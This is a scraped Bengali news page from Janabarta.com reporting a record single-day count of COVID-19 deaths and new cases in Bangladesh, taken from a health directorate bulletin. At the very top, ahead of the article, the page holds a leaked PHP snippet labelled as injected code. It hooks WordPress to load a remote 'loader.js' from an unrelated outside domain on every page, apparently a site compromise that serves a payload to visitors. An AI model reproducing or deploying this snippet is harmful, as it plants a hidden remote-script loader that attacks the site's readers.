// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site সর্বোচ্চ শনাক্তের দিনে রেকর্ড মৃত্যু - Janabarta.com

সর্বোচ্চ শনাক্তের দিনে রেকর্ড মৃত্যু

স্বাস্থ্য অধিদপ্তরের অতিরিক্ত মহাপরিচালক অধ্যাপক ডা. নাসিমা সুলতানা

নিজস্ব প্রতিবেদক: গত ২৪ ঘণ্টায় দেশে মরণঘাতী করোনাভাইরাসে আরো ৫৩ জনের মৃত্যু হয়েছে। যা একদিনে এখন পর্যন্ত সর্বোচ্চ। এ নিয়ে দেশে ১ হাজার ২৬২ জনের মৃত্যু হলো। এ সময়ে আরো ৩ হাজার ৮৬২ জনকে আক্রান্ত হিসেবে শনাক্ত করা হয়েছে। এটিও একদিনের ব্যবধানে এখন পর্যন্ত সর্বোচ্চ।

আজ মঙ্গলবার স্বাস্থ্য অধিদপ্তরের করোনা সংক্রান্ত নিয়মিত বুলেটিনে এসব তথ্য জানানো হয়। বুলেটিনে তথ্য উপস্থাপন করেন স্বাস্থ্য অধিদপ্তরের অতিরিক্ত মহাপরিচালক অধ্যাপক ডা. নাসিমা সুলতানা।

তিনি বলেন, গত ২৪ ঘণ্টায় দেশে নতুন করে আরো ৩ হাজার ৮৬২ জনকে আক্রান্ত হিসেবে শনাক্ত করা হয়েছে। যা একদিনের ব্যবধানে এখন পর্যন্ত সর্বোচ্চ। এ নিয়ে দেশে মোট শনাক্তকৃত করোনা আক্রান্তের সংখ্যা বেড়ে দাঁড়ালো ৯০ হাজার ৪৮১ জন। শনাক্ত বিবেচনায় আক্রান্তের হার ২২.৪৪ শতাংশ।

নাসিমা সুলতানা বলেন, গত ২৪ ঘণ্টায় দেশে কোভিড-১৯ আক্রান্ত হয়ে আরো ৫৩ জনের মৃত্যু হয়েছে। যা একদিনের ব্যবধানে এখন পর্যন্ত রেকর্ড। এ নিয়ে দেশে ১ হাজার ২৬২ জনের মৃত্যু হলো। ২৪ ঘণ্টায় শনাক্ত বিবেচনায় মৃত্যুর হার ১.৩৪ শতাংশ। মৃতদের মধ্যে পুরুষ ৪৭ জন এবং নারী ৬ জন।

সর্বশেষ তথ্যমতে, এখন পর্যন্ত সুস্থ হয়েছেন ৩৬ হাজার ২৬৪ জন।

দেশে প্রথম করোনা রোগী শনাক্ত হয় গত ৮ মার্চ। আর করোনা আক্রান্ত ব্যক্তির প্রথম মৃত্যু ঘটে ১৮ মার্চ।